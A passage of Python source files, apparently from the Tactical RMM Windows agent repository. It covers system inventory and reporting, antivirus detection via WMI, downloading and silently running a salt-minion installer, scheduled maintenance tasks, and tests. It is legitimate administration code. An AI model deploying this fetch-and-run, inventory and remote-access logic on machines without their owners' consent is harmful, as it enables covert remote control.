ret\n\n def get_total_ram(self):\n return math.ceil((psutil.virtual_memory().total / 1_073_741_824))\n\n def get_logged_on_user(self):\n try:\n return psutil.users()[0].name\n except Exception:\n return \"None\"\n\n def get_public_ip(self):\n try:\n ifconfig = requests.get(\"https://ifconfig.co/ip\", timeout=5).text.strip()\n\n if not validators.ipv4(ifconfig) and not validators.ipv6(ifconfig):\n icanhaz = requests.get(\"https://icanhazip.com\", timeout=7).text.strip()\n\n if not validators.ipv4(icanhaz) and not validators.ipv6(icanhaz):\n return \"error\"\n else:\n return icanhaz\n else:\n return ifconfig\n\n except Exception as e:\n self.logger.debug(e)\n return \"error\"\n\n def get_cmd_output(self, cmd, timeout=30):\n try:\n r = subprocess.run(cmd, capture_output=True, timeout=timeout)\n except Exception as e:\n self.logger.debug(e)\n return \"error getting output\"\n\n if r.stdout:\n return r.stdout.decode(\"utf-8\", errors=\"ignore\")\n elif r.stderr:\n return r.stderr.decode(\"utf-8\", errors=\"ignore\")\n else:\n return \"error getting output\"\n\n def get_os(self):\n try:\n os = wmi.WMI().Win32_OperatingSystem()[0]\n return (\n f\"{os.Caption}, {platform.architecture()[0]} (build {os.BuildNumber})\"\n )\n except Exception as e:\n self.logger.debug(e)\n return \"unknown-os\"\n\n def get_disks(self):\n disks = defaultdict(dict)\n try:\n for part in psutil.disk_partitions(all=False):\n if os.name == \"nt\":\n if \"cdrom\" in part.opts or part.fstype == \"\":\n continue\n usage = psutil.disk_usage(part.mountpoint)\n device = part.device.split(\"\\\\\", 1)[0]\n disks[device][\"device\"] = device\n disks[device][\"total\"] = bytes2human(usage.total)\n disks[device][\"used\"] = bytes2human(usage.used)\n disks[device][\"free\"] = bytes2human(usage.free)\n disks[device][\"percent\"] = int(usage.percent)\n disks[device][\"fstype\"] = part.fstype\n except Exception as e:\n self.logger.debug(e)\n disks = {\"error\": \"error getting disk info\"}\n\n return disks\n\n def get_platform_release(self):\n try:\n os = get_os_version_info()\n grains = get_windows_os_release_grain(os[\"Caption\"], os[\"ProductType\"])\n plat = platform.system().lower()\n plat_release = f\"{plat}-{grains}\"\n except Exception as e:\n self.logger.debug(e)\n plat_release = \"unknown-release\"\n\n return plat_release\n\n def get_av(self):\n try:\n r = subprocess.run(\n [\n \"wmic\",\n \"/Namespace:\\\\\\\\root\\SecurityCenter2\",\n \"Path\",\n \"AntiVirusProduct\",\n \"get\",\n 
\"displayName\" \"/FORMAT:List\",\n ],\n capture_output=True,\n timeout=30,\n )\n\n if r.stdout:\n out = (\n r.stdout.decode(\"utf-8\", errors=\"ignore\")\n .lower()\n .replace(\" \", \"\")\n .splitlines()\n )\n out[:] = [i for i in out if i != \"\"] # remove empty list items\n\n if len(out) == 1 and out[0] == \"displayname=windowsdefender\":\n return \"windowsdefender\"\n\n elif len(out) == 2:\n if \"displayname=windowsdefender\" in out:\n out.remove(\"displayname=windowsdefender\")\n return out[0].split(\"displayname=\", 1)[1]\n\n return \"n/a\"\n\n elif r.stderr:\n return \"n/a\"\n else:\n return \"n/a\"\n except Exception as e:\n self.logger.debug(e)\n return \"n/a\"\n\n def salt_call_ret_bool(self, cmd, args=[], timeout=30):\n assert isinstance(args, list)\n try:\n command = [self.salt_call, cmd, \"--local\", f\"--timeout={timeout}\"]\n\n if args:\n # extend list at 3rd position\n command[2:2] = args\n\n r = subprocess.run(command, capture_output=True, timeout=timeout)\n except Exception as e:\n self.logger.debug(e)\n return False\n else:\n try:\n ret = json.loads(r.stdout.decode(\"utf-8\", errors=\"ignore\"))\n if ret[\"local\"]:\n return True\n else:\n return False\n except Exception as e:\n self.logger.debug(e)\n return False\n\n def get_salt_version(self):\n cmd = [self.salt_call, \"pkg.list_pkgs\", \"--local\", \"--timeout=45\"]\n try:\n r = subprocess.run(cmd, capture_output=True, timeout=50)\n ret = json.loads(r.stdout.decode(\"utf-8\", errors=\"ignore\"))\n ver = [\n (k, v) for k, v in ret[\"local\"].items() if \"salt minion\" in k.lower()\n ][0][1]\n except Exception as e:\n self.logger.debug(e)\n return False\n else:\n return ver\n\n def wait_for_service(self, svc, status, retries=10):\n attempts = 0\n\n while 1:\n try:\n service = psutil.win_service_get(svc)\n except psutil.NoSuchProcess:\n attempts += 1\n sleep(5)\n else:\n stat = service.status()\n if stat != status:\n attempts += 1\n sleep(5)\n else:\n attempts = 0\n\n if attempts == 0 or attempts >= retries:\n break\n\n def force_kill_salt(self):\n pids = []\n for proc in psutil.process_iter():\n with proc.oneshot():\n if proc.name().lower() == \"python.exe\" and \"salt\" in proc.exe():\n pids.append(proc.pid)\n\n for pid in pids:\n try:\n self.logger.debug(f\"killing proc with pid {pid}\")\n kill_proc(pid)\n except:\n continue\n\n def update_salt(self):\n try:\n get = f\"{self.astor.server}/api/v2/{self.astor.agentid}/saltminion/\"\n r = requests.get(get, headers=self.headers, timeout=15, verify=self.verify)\n if r.status_code != 200:\n self.logger.error(r.status_code)\n return\n\n try:\n current_ver = r.json()[\"currentVer\"]\n latest_ver = r.json()[\"latestVer\"]\n salt_id = r.json()[\"salt_id\"]\n except Exception as e:\n self.logger.error(e)\n return\n\n installed_ver = self.get_salt_version()\n if not isinstance(installed_ver, str):\n self.logger.error(\"Unable to get installed salt version. Aborting\")\n return\n\n if latest_ver == installed_ver:\n self.logger.debug(\n f\"Latest version {latest_ver} is same as installed version {installed_ver}. Skipping.\"\n )\n return\n\n self.logger.info(\"Updating salt\")\n\n try:\n get_minion = requests.get(\n self.salt_minion_exe, stream=True, timeout=900\n )\n except Exception as e:\n self.logger.error(e)\n return\n\n if get_minion.status_code != 200:\n self.logger.error(\n f\"{get_minion.status_code}: Unable to download salt-minion. 
Aborting\"\n )\n return False\n\n minion_file = os.path.join(self.programdir, self.salt_installer)\n if os.path.exists(minion_file):\n os.remove(minion_file)\n\n sleep(1)\n with open(minion_file, \"wb\") as f:\n for chunk in get_minion.iter_content(chunk_size=1024):\n if chunk:\n f.write(chunk)\n\n del get_minion\n\n subprocess.run(\n [self.nssm, \"stop\", \"checkrunner\"], capture_output=True, timeout=60\n )\n\n self.logger.debug(\"stopping salt-minion\")\n subprocess.run(\n [self.nssm, \"stop\", \"salt-minion\"], capture_output=True, timeout=60\n )\n self.wait_for_service(svc=\"salt-minion\", status=\"stopped\", retries=15)\n self.logger.debug(\"salt svc was stopped\")\n\n self.force_kill_salt()\n\n salt_cmd = [\n self.salt_installer,\n \"/S\",\n \"/custom-config=saltcustom\",\n f\"/master={self.astor.salt_master}\",\n f\"/minion-name={salt_id}\",\n \"/start-minion=1\",\n ]\n\n self.logger.debug(\"running salt update command\")\n try:\n r = subprocess.run(\n salt_cmd,\n cwd=self.programdir,\n capture_output=True,\n shell=True,\n timeout=300,\n )\n except Exception as e:\n self.logger.error(e)\n subprocess.run(\n [self.nssm, \"start\", \"checkrunner\"], capture_output=True, timeout=60\n )\n return\n\n self.logger.debug(\"waiting for salt to start\")\n self.wait_for_service(svc=\"salt-minion\", status=\"running\")\n self.logger.debug(\"salt started\")\n\n subprocess.run(\n [self.nssm, \"start\", \"checkrunner\"], capture_output=True, timeout=60\n )\n\n put = f\"{self.astor.server}/api/v2/saltminion/\"\n payload = {\"ver\": latest_ver, \"agent_id\": self.astor.agentid}\n r = requests.put(\n put,\n json.dumps(payload),\n headers=self.headers,\n timeout=30,\n verify=self.verify,\n )\n if r.status_code != 200:\n self.logger.error(r.status_code)\n\n self.logger.info(f\"Salt was updated from {installed_ver} to {latest_ver}\")\n except Exception as e:\n self.logger.error(e)\n\n def recover_salt(self):\n try:\n r = subprocess.run(\n [self.nssm, \"stop\", \"salt-minion\"], capture_output=True, timeout=30\n )\n\n self.wait_for_service(svc=\"salt-minion\", status=\"stopped\", retries=15)\n self.fix_salt(by_time=False)\n self.force_kill_salt()\n\n r = subprocess.run(\n [\"ipconfig\", \"/flushdns\"], capture_output=True, timeout=30\n )\n r = subprocess.run(\n [self.nssm, \"start\", \"salt-minion\"], capture_output=True, timeout=30\n )\n except Exception as e:\n self.logger.error(e)\n\n def recover_mesh(self):\n self._mesh_service_action(\"stop\")\n self.wait_for_service(svc=\"mesh agent\", status=\"stopped\", retries=3)\n pids = [\n proc.info\n for proc in psutil.process_iter(attrs=[\"pid\", \"name\"])\n if \"meshagent\" in proc.info[\"name\"].lower()\n ]\n\n for pid in pids:\n kill_proc(pid[\"pid\"])\n\n mesh1 = os.path.join(os.environ[\"ProgramFiles\"], \"Mesh Agent\", \"MeshAgent.exe\")\n mesh2 = os.path.join(self.programdir, self.mesh_installer)\n if os.path.exists(mesh1):\n exe = mesh1\n else:\n exe = mesh2\n\n r = subprocess.run([exe, \"-nodeidhex\"], capture_output=True, timeout=30)\n if r.returncode != 0:\n self._mesh_service_action(\"start\")\n return\n\n node_hex = r.stdout.decode(\"utf-8\", errors=\"ignore\").strip()\n if \"not defined\" in node_hex.lower():\n self._mesh_service_action(\"start\")\n return\n\n try:\n mesh_info = f\"{self.astor.server}/api/v1/{self.astor.agentpk}/meshinfo/\"\n resp = requests.get(\n mesh_info, headers=self.headers, timeout=15, verify=self.verify\n )\n except Exception:\n self._mesh_service_action(\"start\")\n return\n\n if resp.status_code == 200 and 
isinstance(resp.json(), str):\n if node_hex != resp.json():\n payload = {\"nodeidhex\": node_hex}\n requests.patch(\n mesh_info,\n json.dumps(payload),\n headers=self.headers,\n timeout=15,\n verify=self.verify,\n )\n\n self._mesh_service_action(\"start\")\n\n def spawn_detached_process(self, cmd, shell=False):\n CREATE_NEW_PROCESS_GROUP = 0x00000200\n DETACHED_PROCESS = 0x00000008\n p = subprocess.Popen(\n cmd,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n close_fds=True,\n shell=shell,\n creationflags=DETACHED_PROCESS | CREATE_NEW_PROCESS_GROUP,\n )\n return p.pid\n\n def cleanup(self):\n self.cleanup_tasks()\n\n def fix_salt(self, by_time=True):\n \"\"\"\n Script checks use salt-call, which for whatever reason becomes unstable after around 24 hours of uptime\n This leads to tons of hung python processes not being killed even with timeout set in salt's cmd.script module\n This function runs every hour as a scheduled task to clean up hung processes\n \"\"\"\n\n # strings that will be in the scriptchecks command line args\n # we check to see if any of these are in our long running processes\n # we don't want to kill salt's main process, just the ones that have\n # any of the following args\n script_checks = (\n \"win_agent.run_python_script\",\n \"salt-call\",\n \"userdefined\",\n \"salt://scripts\",\n \"cmd.script\",\n )\n\n pids = []\n\n for proc in psutil.process_iter():\n with proc.oneshot():\n if proc.name() == \"python.exe\" or proc.name == \"pythonw.exe\":\n if \"salt\" in proc.exe():\n if any(_ in proc.cmdline() for _ in script_checks):\n if by_time:\n # psutil returns the process creation time as seconds since epoch\n # convert it and the current local time now to utc so we can compare them\n proc_ct = dt.datetime.fromtimestamp(\n proc.create_time()\n ).replace(tzinfo=dt.timezone.utc)\n\n utc_now = dt.datetime.now(dt.timezone.utc)\n\n # seconds since the process was created\n seconds = int(abs(utc_now - proc_ct).total_seconds())\n\n # if process has been running for > 24 hours, need to kill it\n if seconds > 86_400:\n pids.append(proc.pid)\n\n else:\n # if we are uninstalling, don't care about time.\n # kill everything that's hung\n pids.append(proc.pid)\n\n if pids:\n this_proc = os.getpid()\n for pid in pids:\n if pid == this_proc:\n # don't kill myself\n continue\n\n self.logger.warning(f\"Killing salt pid: {pid}\")\n kill_proc(pid)\n\n def _compress_json(self, j):\n return base64.b64encode(\n zlib.compress(json.dumps(j).encode(\"utf-8\", errors=\"ignore\"))\n ).decode(\"ascii\", errors=\"ignore\")\n\n def _mesh_service_action(self, action):\n r = subprocess.run(\n [\"sc\", action, \"mesh agent\"], capture_output=True, timeout=30\n )\n\n def fix_mesh(self):\n \"\"\"\n Mesh agent will randomly bug out and kill cpu usage\n This functions runs every hour as a scheduled task to solve that\n \"\"\"\n mesh = [\n proc.info\n for proc in psutil.process_iter(attrs=[\"pid\", \"name\"])\n if \"meshagent\" in proc.info[\"name\"].lower()\n ]\n\n if mesh:\n try:\n proc = psutil.Process(mesh[0][\"pid\"])\n except psutil.NoSuchProcess:\n try:\n self._mesh_service_action(\"stop\")\n sleep(3)\n self._mesh_service_action(\"start\")\n finally:\n return\n\n cpu_usage = proc.cpu_percent(10) / psutil.cpu_count()\n\n if cpu_usage >= 15.0:\n self.logger.warning(\n f\"Mesh agent cpu usage: {cpu_usage}%. 
Restarting...\"\n )\n\n self._mesh_service_action(\"stop\")\n self.wait_for_service(svc=\"mesh agent\", status=\"stopped\", retries=10)\n\n # sometimes stopping service doesn't kill the hung proc\n mesh2 = [\n proc.info\n for proc in psutil.process_iter(attrs=[\"pid\", \"name\"])\n if \"meshagent\" in proc.info[\"name\"].lower()\n ]\n\n if mesh2:\n pids = []\n for proc in mesh2:\n pids.append(proc[\"pid\"])\n\n for pid in pids:\n kill_proc(pid)\n\n sleep(1)\n\n self._mesh_service_action(\"start\")\n\n def create_fix_salt_task(self):\n\n start_obj = dt.datetime.now() + dt.timedelta(minutes=5)\n start_time = dt.datetime.strftime(start_obj, \"%H:%M\")\n\n cmd = [\n \"name=TacticalRMM_fixsalt\",\n \"force=True\",\n \"action_type=Execute\",\n f'cmd=\"{self.exe}\"',\n \"arguments='-m fixsalt'\",\n \"trigger_type=Daily\",\n f\"start_time='{start_time}'\",\n \"repeat_interval='1 hour'\",\n \"ac_only=False\",\n \"stop_if_on_batteries=False\",\n ]\n\n return self.salt_call_ret_bool(\"task.create_task\", args=cmd)\n\n def create_fix_mesh_task(self):\n\n start_obj = dt.datetime.now() + dt.timedelta(minutes=7)\n start_time = dt.datetime.strftime(start_obj, \"%H:%M\")\n\n cmd = [\n \"name=TacticalRMM_fixmesh\",\n \"force=True\",\n \"action_type=Execute\",\n f'cmd=\"{self.exe}\"',\n \"arguments='-m fixmesh'\",\n \"trigger_type=Daily\",\n f\"start_time='{start_time}'\",\n \"repeat_interval='1 hour'\",\n \"ac_only=False\",\n \"stop_if_on_batteries=False\",\n ]\n\n return self.salt_call_ret_bool(\"task.create_task\", args=cmd)\n\n def cleanup_tasks(self):\n r = subprocess.run(\n [self.salt_call, \"task.list_tasks\", \"--local\"], capture_output=True\n )\n\n ret = json.loads(r.stdout.decode(\"utf-8\", \"ignore\"))[\"local\"]\n\n tasks = [task for task in ret if task.startswith(\"TacticalRMM_\")]\n\n for task in tasks:\n try:\n self.salt_call_ret_bool(\"task.delete_task\", args=[task])\n except:\n pass\n\n def send_system_info(self):\n class SystemDetail:\n def __init__(self):\n c = wmi.WMI()\n self.comp_sys_prod = c.Win32_ComputerSystemProduct()\n self.comp_sys = c.Win32_ComputerSystem()\n self.memory = c.Win32_PhysicalMemory()\n self.os = c.Win32_OperatingSystem()\n self.base_board = c.Win32_BaseBoard()\n self.bios = c.Win32_BIOS()\n self.disk = c.Win32_DiskDrive()\n self.network_adapter = c.Win32_NetworkAdapter()\n self.network_config = c.Win32_NetworkAdapterConfiguration()\n self.desktop_monitor = c.Win32_DesktopMonitor()\n self.cpu = c.Win32_Processor()\n self.usb = c.Win32_USBController()\n\n def get_all(self, obj):\n ret = []\n for i in obj:\n tmp = [\n {j: getattr(i, j)}\n for j in list(i.properties)\n if getattr(i, j) is not None\n ]\n ret.append(tmp)\n\n return ret\n\n info = SystemDetail()\n try:\n sysinfo = {\n \"comp_sys_prod\": info.get_all(info.comp_sys_prod),\n \"comp_sys\": info.get_all(info.comp_sys),\n \"mem\": info.get_all(info.memory),\n \"os\": info.get_all(info.os),\n \"base_board\": info.get_all(info.base_board),\n \"bios\": info.get_all(info.bios),\n \"disk\": info.get_all(info.disk),\n \"network_adapter\": info.get_all(info.network_adapter),\n \"network_config\": info.get_all(info.network_config),\n \"desktop_monitor\": info.get_all(info.desktop_monitor),\n \"cpu\": info.get_all(info.cpu),\n \"usb\": info.get_all(info.usb),\n }\n\n except Exception as e:\n self.logger.debug(e)\n return\n\n payload = {\"agent_id\": self.astor.agentid, \"sysinfo\": sysinfo}\n url = f\"{self.astor.server}/api/v2/sysinfo/\"\n try:\n r = requests.patch(\n url,\n json.dumps(payload),\n 
headers=self.headers,\n timeout=15,\n verify=self.verify,\n )\n except:\n pass\n\n def generate_agent_id(self):\n rand = \"\".join(random.choice(string.ascii_letters) for _ in range(35))\n return f\"{rand}-{self.hostname}\"\n\n def uninstall_salt(self):\n print(\"Stopping salt-minion service\", flush=True)\n r = subprocess.run(\n [self.nssm, \"stop\", \"salt-minion\"], timeout=45, capture_output=True\n )\n\n self.wait_for_service(svc=\"salt-minion\", status=\"stopped\", retries=15)\n\n # clean up any hung salt python procs\n self.force_kill_salt()\n\n print(\"Uninstalling existing salt-minion\", flush=True)\n salt_uninst = os.path.join(self.system_drive, \"\\\\salt\\\\uninst.exe\")\n r = subprocess.run(\n [salt_uninst, \"/S\"], shell=True, timeout=120, capture_output=True\n )\n sleep(30)\n\n remove_dir(os.path.join(self.system_drive, \"\\\\salt\"))\n print(\"Salt was removed\", flush=True)\n\n\ndef show_agent_status(window, gui):\n import win32api\n import win32con\n import win32gui\n import win32ts\n import win32ui\n\n class AgentStatus:\n def __init__(self, agent_status, salt_status, check_status, mesh_status):\n self.agent_status = agent_status\n self.salt_status = salt_status\n self.check_status = check_status\n self.mesh_status = mesh_status\n self.icon = os.path.join(os.getcwd(), \"onit.ico\")\n win32gui.InitCommonControls()\n self.hinst = win32api.GetModuleHandle(None)\n className = \"AgentStatus\"\n message_map = {\n win32con.WM_DESTROY: self.OnDestroy,\n }\n wc = win32gui.WNDCLASS()\n wc.style = win32con.CS_HREDRAW | win32con.CS_VREDRAW\n try:\n wc.hIcon = win32gui.LoadImage(\n self.hinst,\n self.icon,\n win32con.IMAGE_ICON,\n 0,\n 0,\n win32con.LR_LOADFROMFILE,\n )\n except Exception:\n pass\n wc.lpfnWndProc = message_map\n wc.lpszClassName = className\n win32gui.RegisterClass(wc)\n style = win32con.WS_OVERLAPPEDWINDOW\n self.hwnd = win32gui.CreateWindow(\n className,\n \"Tactical RMM\",\n style,\n win32con.CW_USEDEFAULT,\n win32con.CW_USEDEFAULT,\n 400,\n 300,\n 0,\n 0,\n self.hinst,\n None,\n )\n\n win32gui.ShowWindow(self.hwnd, win32con.SW_SHOW)\n\n hDC, paintStruct = win32gui.BeginPaint(self.hwnd)\n rect = win32gui.GetClientRect(self.hwnd)\n win32gui.DrawText(\n hDC,\n f\"Agent: {self.agent_status}\",\n -1,\n (0, 0, 384, 201),\n win32con.DT_SINGLELINE | win32con.DT_CENTER | win32con.DT_VCENTER,\n )\n\n win32gui.DrawText(\n hDC,\n f\"Check Runner: {self.check_status}\",\n -1,\n (0, 0, 384, 241),\n win32con.DT_SINGLELINE | win32con.DT_CENTER | win32con.DT_VCENTER,\n )\n win32gui.DrawText(\n hDC,\n f\"Salt Minion: {self.salt_status}\",\n -1,\n (0, 0, 384, 281),\n win32con.DT_SINGLELINE | win32con.DT_CENTER | win32con.DT_VCENTER,\n )\n win32gui.DrawText(\n hDC,\n f\"Mesh Agent: {self.mesh_status}\",\n -1,\n (0, 0, 384, 321),\n win32con.DT_SINGLELINE | win32con.DT_CENTER | win32con.DT_VCENTER,\n )\n\n win32gui.EndPaint(self.hwnd, paintStruct)\n win32gui.UpdateWindow(self.hwnd)\n\n def OnDestroy(self, hwnd, message, wparam, lparam):\n win32gui.PostQuitMessage(0)\n return True\n\n try:\n agent_status = psutil.win_service_get(\"tacticalagent\").status()\n except psutil.NoSuchProcess:\n agent_status = \"Not Installed\"\n\n try:\n salt_status = psutil.win_service_get(\"salt-minion\").status()\n except psutil.NoSuchProcess:\n salt_status = \"Not Installed\"\n\n try:\n check_status = psutil.win_service_get(\"checkrunner\").status()\n except psutil.NoSuchProcess:\n check_status = \"Not Installed\"\n\n try:\n mesh_status = psutil.win_service_get(\"Mesh Agent\").status()\n except 
psutil.NoSuchProcess:\n mesh_status = \"Not Installed\"\n\n if gui:\n win32gui.ShowWindow(window, win32con.SW_HIDE)\n w = AgentStatus(agent_status, salt_status, check_status, mesh_status)\n win32gui.PumpMessages()\n win32gui.CloseWindow(window)\n else:\n print(\"Agent: \", agent_status)\n print(\"Check Runner: \", check_status)\n print(\"Salt Minion: \", salt_status)\n print(\"Mesh Agent: \", mesh_status)\n" }, { "alpha_fraction": 0.6089502573013306, "alphanum_fraction": 0.6210790276527405, "avg_line_length": 24.86516761779785, "blob_id": "b66923614041695b705df5569cd26cd19a99f622", "content_id": "08acf43f2aa5c52841d15a4d8fe2551737c9f4d5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2391, "license_type": "permissive", "max_line_length": 94, "num_lines": 89, "path": "/tests/test_agent.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import os\r\nimport platform\r\nimport sys\r\nfrom unittest import mock\r\n\r\nimport pytest\r\nimport validators\r\n\r\nsys.path.append(\r\n os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\\\\winagent\"))\r\n)\r\n\r\nfrom agent import WindowsAgent\r\n\r\n\r\[email protected](scope=\"session\", autouse=True)\r\[email protected](\"agent.WindowsAgent.__init__\", return_value=None)\r\ndef agent(self):\r\n return WindowsAgent()\r\n\r\n\r\ndef test_boot_time(agent):\r\n assert type(agent.get_boot_time()) is float\r\n\r\n\r\ndef test_used_ram(agent):\r\n assert type(agent.get_used_ram()) is int\r\n\r\n\r\ndef test_total_ram(agent):\r\n assert type(agent.get_total_ram()) is int\r\n\r\n\r\[email protected](\"TRAVIS\" in os.environ, reason=\"doesn't work in travis\")\r\ndef test_services(agent):\r\n services = agent.get_services()\r\n spooler = list(filter(lambda x: x[\"name\"] == \"Spooler\", services))[0]\r\n assert type(services) is list\r\n assert spooler[\"display_name\"] == \"Print Spooler\"\r\n assert spooler[\"username\"] == \"LocalSystem\"\r\n\r\n\r\ndef test_disks(agent):\r\n disks = agent.get_disks()\r\n assert disks[\"C:\"][\"device\"] == \"C:\"\r\n\r\n\r\ndef test_os(agent):\r\n assert \"Microsoft Windows\" in agent.get_os()\r\n\r\n\r\ndef test_cmd_output(agent):\r\n output = agent.get_cmd_output([\"ping\", \"8.8.8.8\"])\r\n success = [\"Reply\", \"bytes\", \"time\", \"TTL\"]\r\n assert all(x in output for x in success)\r\n\r\n\r\ndef test_public_ip(agent):\r\n error = []\r\n if not validators.ipv4(agent.get_public_ip()) and not validators.ipv6(\r\n agent.get_public_ip()\r\n ):\r\n error.append(\"not ipv4 or ipv6\")\r\n\r\n assert not error\r\n\r\n\r\ndef test_platform_release(agent):\r\n assert \"windows\" in agent.get_platform_release().lower()\r\n\r\n\r\ndef test_arch(agent):\r\n agent.programdir = \"C:\\\\Program Files\\\\TacticalAgent\"\r\n\r\n if platform.machine().lower() == \"amd64\":\r\n agent.arch = \"64\"\r\n assert (\r\n agent.salt_minion_exe\r\n == \"https://github.com/wh1te909/winagent/raw/master/bin/salt-minion-setup.exe\"\r\n )\r\n assert agent.nssm == \"C:\\\\Program Files\\\\TacticalAgent\\\\nssm.exe\"\r\n\r\n if platform.machine().lower() == \"x86\":\r\n agent.arch = \"32\"\r\n assert (\r\n agent.salt_minion_exe\r\n == \"https://github.com/wh1te909/winagent/raw/master/bin/salt-minion-setup-x86.exe\"\r\n )\r\n assert agent.nssm == \"C:\\\\Program Files\\\\TacticalAgent\\\\nssm-x86.exe\"\r\n" }, { "alpha_fraction": 0.4522045850753784, "alphanum_fraction": 0.454673707485199, "avg_line_length": 27.842105865478516, "blob_id": 
"0deddf176dcd7e48a7c6f9253dac36badc40a7a9", "content_id": "c25ece970c6ae2b82364a642d52d9d1faee84672", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2835, "license_type": "permissive", "max_line_length": 86, "num_lines": 95, "path": "/winagent/checkrunner.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import asyncio\r\nimport json\r\nfrom time import sleep\r\n\r\nimport requests\r\n\r\nfrom agent import WindowsAgent\r\n\r\n\r\nclass CheckRunner(WindowsAgent):\r\n def __init__(self, log_level, log_to):\r\n super().__init__(log_level, log_to)\r\n self.checkrunner = (\r\n f\"{self.astor.server}/api/v2/{self.astor.agentid}/checkrunner/\"\r\n )\r\n\r\n def get_checks(self):\r\n try:\r\n resp = requests.get(\r\n self.checkrunner, headers=self.headers, timeout=15, verify=self.verify\r\n )\r\n except Exception as e:\r\n self.logger.debug(e)\r\n return False\r\n else:\r\n try:\r\n data = resp.json()\r\n if data[\"checks\"]:\r\n return data\r\n else:\r\n return False\r\n except Exception as e:\r\n self.logger.debug(e)\r\n return False\r\n\r\n async def run_checks(self, data):\r\n try:\r\n tasks = []\r\n checks = data[\"checks\"]\r\n\r\n for check in checks:\r\n\r\n if check[\"check_type\"] == \"cpuload\":\r\n tasks.append(self.cpu_load_check(check))\r\n\r\n elif check[\"check_type\"] == \"ping\":\r\n tasks.append(self.ping_check(check))\r\n\r\n elif check[\"check_type\"] == \"script\":\r\n tasks.append(self.script_check(check))\r\n\r\n elif check[\"check_type\"] == \"diskspace\":\r\n tasks.append(self.disk_check(check))\r\n\r\n elif check[\"check_type\"] == \"memory\":\r\n tasks.append(self.mem_check(check))\r\n\r\n elif check[\"check_type\"] == \"winsvc\":\r\n tasks.append(self.win_service_check(check))\r\n\r\n elif check[\"check_type\"] == \"eventlog\":\r\n tasks.append(self.event_log_check(check))\r\n\r\n await asyncio.gather(*tasks)\r\n\r\n except Exception as e:\r\n self.logger.debug(e)\r\n\r\n def run(self):\r\n ret = self.get_checks()\r\n if not ret:\r\n return False\r\n else:\r\n asyncio.run(self.run_checks(ret))\r\n\r\n def run_forever(self):\r\n self.logger.info(\"Checkrunner service started\")\r\n\r\n while 1:\r\n interval = 120\r\n try:\r\n ret = self.get_checks()\r\n except:\r\n sleep(interval)\r\n else:\r\n if ret:\r\n try:\r\n interval = int(ret[\"check_interval\"])\r\n asyncio.run(self.run_checks(ret))\r\n except Exception as e:\r\n self.logger.debug(e)\r\n finally:\r\n sleep(interval)\r\n else:\r\n sleep(interval)\r\n" }, { "alpha_fraction": 0.46290984749794006, "alphanum_fraction": 0.470016211271286, "avg_line_length": 29.614503860473633, "blob_id": "5a71d9e7b558b72cafba7ffe76b6f8d53bc93167", "content_id": "51d65bfade23625b444f781b0970f014a779c1d0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16042, "license_type": "permissive", "max_line_length": 108, "num_lines": 524, "path": "/winagent/installer.py", "repo_name": "CrabityGames/winagent", "src_encoding": "UTF-8", "text": "import json\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\nfrom time import sleep\nfrom urllib.parse import urlparse\n\nimport psutil\nimport requests\nimport validators\n\nfrom agent import AgentStorage, WindowsAgent, db\nfrom mesh import MeshAgent\nfrom utils import disable_sleep_hibernate, enable_ping, enable_rdp\n\n\nclass Installer(WindowsAgent):\n def __init__(\n self,\n api_url,\n client_id,\n site_id,\n agent_desc,\n 
agent_type,\n power,\n rdp,\n ping,\n auth_token,\n local_salt,\n local_mesh,\n cert,\n cmd_timeout,\n log_level,\n log_to=\"stdout\",\n ):\n super().__init__(log_level, log_to)\n self.api_url = api_url\n self.client_id = client_id\n self.site_id = site_id\n self.agent_desc = agent_desc\n self.agent_type = agent_type\n self.disable_power = power\n self.enable_rdp = rdp\n self.enable_ping = ping\n self.auth_token = auth_token\n self.log_level = log_level\n self.log_to = log_to\n self.local_salt = local_salt\n self.local_mesh = local_mesh\n self.cert = cert\n self.cmd_timeout = cmd_timeout if cmd_timeout else 900\n\n def install(self):\n # check for existing installation and exit if found\n try:\n tac = psutil.win_service_get(\"tacticalagent\")\n except psutil.NoSuchProcess:\n pass\n else:\n self.logger.error(\n \"\"\"\n Found tacticalagent service. Please uninstall the existing Tactical Agent first before reinstalling.\n If you're trying to perform an upgrade, do so from the RMM web interface.\n \"\"\"\n )\n sys.stdout.flush()\n sys.exit(1)\n\n self.agent_id = self.generate_agent_id()\n self.logger.debug(f\"{self.agent_id=}\")\n sys.stdout.flush()\n\n # validate the url and get the salt master\n r = urlparse(self.api_url)\n\n if r.scheme != \"https\" and r.scheme != \"http\":\n self.logger.error(\"api url must contain https or http\")\n sys.stdout.flush()\n sys.exit(1)\n\n if validators.domain(r.netloc):\n self.salt_master = r.netloc\n # will match either ipv4 , or ipv4:port\n elif re.match(r\"[0-9]+(?:\\.[0-9]+){3}(:[0-9]+)?\", r.netloc):\n if validators.ipv4(r.netloc):\n self.salt_master = r.netloc\n else:\n self.salt_master = r.netloc.split(\":\")[0]\n else:\n self.logger.error(\"Error parsing api url, unable to get salt-master\")\n sys.stdout.flush()\n sys.exit(1)\n\n self.logger.debug(f\"{self.salt_master=}\")\n sys.stdout.flush()\n\n # set the api base url\n self.api = f\"{r.scheme}://{r.netloc}\"\n\n token_headers = {\n \"content-type\": \"application/json\",\n \"Authorization\": f\"Token {self.auth_token}\",\n }\n\n self.logger.debug(f\"{self.api=}\")\n self.logger.debug(f\"{token_headers=}\")\n\n minion = os.path.join(self.programdir, self.salt_installer)\n self.logger.debug(f\"{minion=}\")\n sys.stdout.flush()\n\n if not self.local_salt:\n # download salt\n print(\"Downloading salt minion\", flush=True)\n try:\n r = requests.get(\n self.salt_minion_exe,\n stream=True,\n timeout=900,\n )\n except Exception as e:\n self.logger.error(e)\n sys.stdout.flush()\n sys.exit(1)\n\n if r.status_code != 200:\n self.logger.error(\n f\"{r.status_code}: Unable to download salt-minion from {self.salt_minion_exe}\"\n )\n sys.stdout.flush()\n sys.exit(1)\n\n with open(minion, \"wb\") as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk:\n f.write(chunk)\n\n del r\n else:\n try:\n shutil.copy2(self.local_salt, minion)\n except 